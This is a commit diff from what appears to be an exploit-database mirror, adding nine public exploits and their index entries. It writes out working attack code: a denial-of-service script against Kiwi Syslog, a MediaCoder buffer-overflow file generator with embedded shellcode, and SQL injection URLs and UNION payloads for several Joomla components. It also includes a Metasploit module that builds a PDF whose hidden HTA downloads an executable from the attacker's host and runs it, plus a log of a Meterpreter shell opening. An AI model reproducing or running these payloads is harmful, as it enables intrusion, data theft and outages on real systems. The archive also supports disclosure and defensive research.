DB: 2017-08-03
9 new exploits Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit) Entrepreneur B2B Script - 'pid' Parameter SQL Injection Joomla! Component SIMGenealogy 2.1.5 - SQL Injection Joomla! Component PHP-Bridge 1.2.3 - SQL Injection Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection
This commit is contained in:
parent
baeaf13b13
commit
a600aa05cd
10 changed files with 419 additions and 0 deletions
|
@ -5635,6 +5635,7 @@ id,file,description,date,author,platform,type,port
|
|||
42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
|
||||
42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
|
||||
42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
|
||||
42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9124,6 +9125,7 @@ id,file,description,date,author,platform,type,port
|
|||
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
||||
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
|
||||
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
|
||||
41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
|
||||
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
|
||||
41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
|
||||
41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
|
||||
|
@ -9166,6 +9168,7 @@ id,file,description,date,author,platform,type,port
|
|||
42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
|
||||
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
|
||||
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
|
||||
42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38210,3 +38213,9 @@ id,file,description,date,author,platform,type,port
|
|||
42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
|
||||
42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
|
||||
42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
|
||||
42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
|
||||
42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
11
platforms/php/webapps/42412.txt
Executable file
11
platforms/php/webapps/42412.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
# Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection
|
||||
# Date: 2017-08-02
|
||||
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
||||
# Vendor Homepage: http://readymadeb2bscript.com/
|
||||
# Version: All Version
|
||||
|
||||
|
||||
Exploit :
|
||||
http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]
|
||||
|
||||
|
15
platforms/php/webapps/42413.txt
Executable file
15
platforms/php/webapps/42413.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 02.08.2017
|
||||
# Vendor : https://www.simbunch.com/
|
||||
# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
|
||||
# Demo: https://www.simbunch.com/demos/simgenealogy
|
||||
# Version: 2.1.5
|
||||
# # # # #
|
||||
# Author: Ihsan Sencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
16
platforms/php/webapps/42414.txt
Executable file
16
platforms/php/webapps/42414.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 02.08.2017
|
||||
# Vendor : http://www.henryschorradt.de/
|
||||
# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
|
||||
# Demo: http://www.henryschorradt.de/joomla-php-bridge/
|
||||
# Version: 1.2.3
|
||||
# # # # #
|
||||
# Author: Ihsan Sencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
|
||||
# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
|
||||
# Etc..
|
||||
# # # # #
|
15
platforms/php/webapps/42415.txt
Executable file
15
platforms/php/webapps/42415.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 02.08.2017
|
||||
# Vendor : http://king-products.net/
|
||||
# Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
|
||||
# Demo: http://demo.king-products.net/
|
||||
# Version: 3.2.4.0
|
||||
# # # # #
|
||||
# Author: Ihsan Sencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
16
platforms/php/webapps/42416.txt
Executable file
16
platforms/php/webapps/42416.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 02.08.2017
|
||||
# Vendor : http://joomlashowroom.com/
|
||||
# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
|
||||
# Demo: http://demo3.joomlashowroom.com/
|
||||
# Version: 4.1.3
|
||||
# # # # #
|
||||
# Author: Ihsan Sencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
|
||||
# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/42417.txt
Executable file
18
platforms/php/webapps/42417.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 02.08.2017
|
||||
# Vendor : http://faboba.com/
|
||||
# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
|
||||
# Demo: http://demoupl.faboba.com/
|
||||
# Version: 1.0.2
|
||||
# # # # #
|
||||
# Author: Ihsan Sencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
|
||||
# -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
|
||||
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
55
platforms/windows/dos/42411.py
Executable file
55
platforms/windows/dos/42411.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
|
||||
# Date: 26/05/2017
|
||||
# Exploit Author: Guillaume Kaddouch
|
||||
# Twitter: @gkweb76
|
||||
# Blog: https://networkfilter.blogspot.com
|
||||
# GitHub: https://github.com/gkweb76/exploits
|
||||
# Vendor Homepage: http://www.solarwinds.com/
|
||||
# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
|
||||
# Version: 9.6.1.6
|
||||
# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
|
||||
# Category: DoS
|
||||
|
||||
"""
|
||||
Disclosure Timeline:
|
||||
--------------------
|
||||
2017-05-20: Vulnerability discovered
|
||||
2017-05-26: Vendor contacted
|
||||
2017-05-31: Vendor answered (technical support)
|
||||
2017-05-31: Vendor contacted (no answer)
|
||||
2017-08-01: Exploit published
|
||||
|
||||
|
||||
Description :
|
||||
-------------
|
||||
A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
|
||||
Apparently any data sent to it make it crash because of a Type Mismatch error.
|
||||
The syslog TCP listener is disabled by default.
|
||||
|
||||
|
||||
Instructions:
|
||||
-------------
|
||||
- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
|
||||
- Run this exploit locally or from your remote attacking machine.
|
||||
"""
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket
|
||||
|
||||
host = "10.0.0.56"
|
||||
port = 1468
|
||||
|
||||
buffer = "crash please?"
|
||||
|
||||
try:
|
||||
print "[*] Connecting to %s:%d" % (host, port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
|
||||
print "[*] Sending buffer... (%d bytes)" % len(buffer)
|
||||
s.send(buffer)
|
||||
s.close()
|
||||
|
||||
print "[*] Done."
|
||||
except:
|
||||
print "[-] Error connecting"
|
45
platforms/windows/local/41971.py
Executable file
45
platforms/windows/local/41971.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
|
||||
# Date : 2017-05-08
|
||||
# Exploit Author : Muhann4d
|
||||
# Vendor Homepage : http://www.mediacoderhq.com
|
||||
# Software Link : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
|
||||
# Tested Version : 0.8.48.5888
|
||||
# Category : Local Buffer Overflow
|
||||
# Tested on OS : Windows 7 Professional SP1 32bit
|
||||
|
||||
|
||||
print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d"
|
||||
from struct import pack
|
||||
|
||||
junk = "http://" + "\x41" * 361
|
||||
nseh = pack('<I',0x909006eb)
|
||||
seh = pack('<I',0x66017187)
|
||||
nops= "\x90" * 20
|
||||
shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
|
||||
"\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
|
||||
"\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
|
||||
"\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
|
||||
"\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
|
||||
"\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
|
||||
"\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
|
||||
"\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
|
||||
"\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
|
||||
"\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
|
||||
"\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
|
||||
"\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
|
||||
"\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
|
||||
"\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
|
||||
"\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
|
||||
|
||||
junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
|
||||
exploit = junk + nseh + seh + nops + shell + junkD
|
||||
|
||||
try:
|
||||
file= open("Exploit.m3u",'w')
|
||||
file.write(exploit)
|
||||
file.close()
|
||||
raw_input("\nExploit has been created!\n")
|
||||
except:
|
||||
print "There has been an Error"
|
||||
|
219
platforms/windows/local/42418.rb
Executable file
219
platforms/windows/local/42418.rb
Executable file
|
@ -0,0 +1,219 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
|
||||
PDF Reader version 11. The saveAs() Javascript API function allows for writing
|
||||
arbitrary files to the file system. Additionally, the launchURL() function allows
|
||||
an attacker to execute local files on the file system and bypass the security dialog
|
||||
|
||||
Note: This is 100% reliable.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
|
||||
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
|
||||
'sinn3r' # help with msf foo!
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-7442' ],
|
||||
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
|
||||
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => false
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 24 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
deregister_options('SSL', 'SSLVersion', 'SSLCert')
|
||||
end
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
vbs = %Q|<head><hta:application
|
||||
applicationname="#{@payload_name}"
|
||||
border="none"
|
||||
borderstyle="normal"
|
||||
caption="false"
|
||||
contextmenu="false"
|
||||
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
|
||||
maximizebutton="false"
|
||||
minimizebutton="false"
|
||||
navigable="false"
|
||||
scroll="false"
|
||||
selection="false"
|
||||
showintaskbar="No"
|
||||
sysmenu="false"
|
||||
version="1.0"
|
||||
windowstate="Minimize"></head>
|
||||
<style>* { visibility: hidden; }</style>
|
||||
<script language="VBScript">
|
||||
window.resizeTo 1,1
|
||||
window.moveTo -2000,-2000
|
||||
</script>
|
||||
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
|
||||
<script language="VBScript">
|
||||
On Error Resume Next
|
||||
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
||||
#{name_xmlhttp}.open "GET","http://#{url}",False
|
||||
#{name_xmlhttp}.send
|
||||
Set #{name_adodb} = CreateObject("ADODB.Stream")
|
||||
#{name_adodb}.Open
|
||||
#{name_adodb}.Type=1
|
||||
#{name_adodb}.Write #{name_xmlhttp}.responseBody
|
||||
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
|
||||
set shellobj = CreateObject("wscript.shell")
|
||||
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
|
||||
</script>|
|
||||
vbs.gsub!(/ /,'')
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending second stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "/Windows/Temp"
|
||||
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
pdf = %Q|%PDF-1.7
|
||||
4 0 obj
|
||||
<<
|
||||
/Length 0
|
||||
>>
|
||||
stream
|
||||
|
|
||||
pdf << build_vbs(payload_src, stager_name)
|
||||
pdf << %Q|
|
||||
endstream endobj
|
||||
5 0 obj
|
||||
<<
|
||||
/Type /Page
|
||||
/Parent 2 0 R
|
||||
/Contents 4 0 R
|
||||
>>
|
||||
endobj
|
||||
1 0 obj
|
||||
<<
|
||||
/Type /Catalog
|
||||
/Pages 2 0 R
|
||||
/OpenAction [ 5 0 R /Fit ]
|
||||
/Names <<
|
||||
/JavaScript <<
|
||||
/Names [ (EmbeddedJS)
|
||||
<<
|
||||
/S /JavaScript
|
||||
/JS (
|
||||
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
)
|
||||
>>
|
||||
]
|
||||
>>
|
||||
>>
|
||||
>>
|
||||
endobj
|
||||
2 0 obj
|
||||
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
|
||||
endobj
|
||||
3 0 obj
|
||||
<<>>
|
||||
endobj
|
||||
xref
|
||||
0 6
|
||||
0000000000 65535 f
|
||||
0000000166 00000 n
|
||||
0000000244 00000 n
|
||||
0000000305 00000 n
|
||||
0000000009 00000 n
|
||||
0000000058 00000 n
|
||||
trailer <<
|
||||
/Size 6
|
||||
/Root 1 0 R
|
||||
>>
|
||||
startxref
|
||||
327
|
||||
%%EOF|
|
||||
pdf.gsub!(/ /,'')
|
||||
file_create(pdf)
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
|
||||
[*] Processing scripts/nitro.rc for ERB directives.
|
||||
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
|
||||
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
|
||||
LHOST => 172.16.175.1
|
||||
resource (scripts/nitro.rc)> exploit
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.175.1:4444
|
||||
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
|
||||
[*] Using URL: http://0.0.0.0:8080/
|
||||
[*] Local IP: http://192.168.100.4:8080/
|
||||
[*] Server started.
|
||||
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
|
||||
[*] Sending stage (957487 bytes) to 172.16.175.232
|
||||
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
|
||||
[+] Deleted C:/Windows/Temp/UOIr.hta
|
||||
|
||||
msf exploit(nitro_reader_jsapi) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > shell
|
||||
Process 2412 created.
|
||||
Channel 2 created.
|
||||
Microsoft Windows [Version 6.1.7601]
|
||||
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Users\researcher\Desktop>
|
||||
=end
|
Loading…
Add table
Reference in a new issue